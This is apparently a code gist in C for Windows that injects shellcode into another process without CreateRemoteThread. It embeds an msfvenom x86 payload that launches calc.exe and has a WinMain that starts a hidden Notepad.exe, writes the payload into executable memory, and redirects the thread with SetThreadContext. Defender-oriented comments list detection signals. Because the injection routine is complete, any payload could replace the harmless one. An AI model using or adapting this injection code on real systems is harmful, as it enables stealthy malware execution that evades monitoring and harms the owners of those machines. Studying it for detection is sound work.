Run shell code in another process without CreateRemoteThread
#pragma comment(lib, "Shell32.lib") | |
#include <windows.h> | |
#include <shlobj.h> | |
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe | |
// Opaque x86 payload blob; the msfvenom line above is the only description of
// its contents given in this file. The final initializer line ends with the
// bytes "calc.exe\0", matching the cmd= argument.
// buf_len is the payload length in bytes (12 lines x 15 bytes + 13 = 193).
// Note: sizeof buf is 194, because the string-literal initializer appends a
// NUL terminator; WinMain below allocates and copies buf_len bytes, not
// sizeof buf.
int buf_len = 193; | |
unsigned char buf[] = | |
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" | |
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" | |
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" | |
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" | |
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" | |
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" | |
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" | |
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" | |
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" | |
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f" | |
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5" | |
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" | |
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; | |
// Entry point. Launches a hidden Notepad.exe from the 32-bit system directory,
// copies buf into that child process, and points the child's primary thread
// at the copy by rewriting its register context (Eip), so the payload runs
// without any CreateRemoteThread call (the technique the gist title refers to).
//
// Review notes, from the defender's side:
//  - x86 only: CONTEXT_i486 and the Eip member are 32-bit CONTEXT fields.
//  - The whole sequence is ordinary Win32 API activity performed by the
//    parent on a child it has just created: a cross-process
//    PAGE_EXECUTE_READWRITE allocation, WriteProcessMemory into it, then
//    SetThreadContext on the child's primary thread. Those three calls, plus a
//    hidden-window Notepad.exe whose parent is not explorer.exe, are the
//    observable events for process-injection detection logic.
//  - Return values of wcscat_s, WriteProcessMemory and SetThreadContext are
//    not checked, and the function returns 0 on every path, so a failed
//    injection is indistinguishable from a successful one to the caller.
//  - The child process is never terminated here; only the two handles are
//    closed, so Notepad.exe stays alive after this program exits.
int CALLBACK WinMain(_In_ HINSTANCE hInstance, _In_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nCmdShow) | |
{ | |
    // Address of the allocation inside the child's address space.
    unsigned char *ptr = NULL; | |
    STARTUPINFO si; | |
    PROCESS_INFORMATION pi; | |
    // Built from the CSIDL_SYSTEMX86 folder plus "\Notepad.exe"; MAX_PATH is
    // the bound passed to wcscat_s.
    WCHAR szNotepadPath[MAX_PATH]; | |
    CONTEXT context; | |
    ZeroMemory(&context, sizeof(context)); | |
    ZeroMemory(&pi, sizeof(pi)); | |
    ZeroMemory(&si, sizeof(si)); | |
    si.cb = sizeof(si); | |
    // CSIDL_SYSTEMX86 resolves to the 32-bit system directory, matching the
    // x86 payload and the x86 CONTEXT fields used below.
    if (SHGetSpecialFolderPath(NULL, szNotepadPath, CSIDL_SYSTEMX86, FALSE)) | |
    { | |
        wcscat_s(szNotepadPath, MAX_PATH, L"\\Notepad.exe"); | |
        // The child is started with its window hidden; nothing is shown to the
        // interactive user.
        si.dwFlags = STARTF_USESHOWWINDOW; | |
        si.wShowWindow = SW_HIDE; | |
        // Creation flags are 0: the child's primary thread starts running
        // immediately. pi.hProcess / pi.hThread are the handles used below.
        if (CreateProcess(NULL, szNotepadPath, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) | |
        { | |
            // RWX allocation of exactly buf_len bytes in the child. A
            // cross-process PAGE_EXECUTE_READWRITE region is itself a
            // high-signal event for memory-scanning and EDR telemetry.
            if ((ptr = VirtualAllocEx(pi.hProcess, NULL, buf_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) != NULL) | |
            { | |
                // Copies buf_len bytes (193, not sizeof buf); the BOOL result
                // and the bytes-written count (NULL) are discarded.
                WriteProcessMemory(pi.hProcess, ptr, buf, buf_len, NULL); | |
                // ContextFlags selects which register groups GetThreadContext
                // fills in; CONTEXT_CONTROL covers Eip on x86.
                context.ContextFlags = CONTEXT_CONTROL | CONTEXT_i486; | |
                if (GetThreadContext(pi.hThread, &context)) | |
                { | |
                    // Redirect the child's primary thread to the copied
                    // payload. DWORD cast is only valid for 32-bit pointers.
                    context.Eip = (DWORD)ptr; | |
                    // Re-set ContextFlags so SetThreadContext writes back the
                    // control registers; its return value is not checked.
                    context.ContextFlags = CONTEXT_CONTROL | CONTEXT_i486; | |
                    SetThreadContext(pi.hThread, &context); | |
                } | |
                // Handles are released but the child keeps running.
                CloseHandle(pi.hProcess); | |
                CloseHandle(pi.hThread); | |
            } | |
        } | |
    } | |
    // 0 regardless of whether any step above succeeded.
    return 0; | |
} |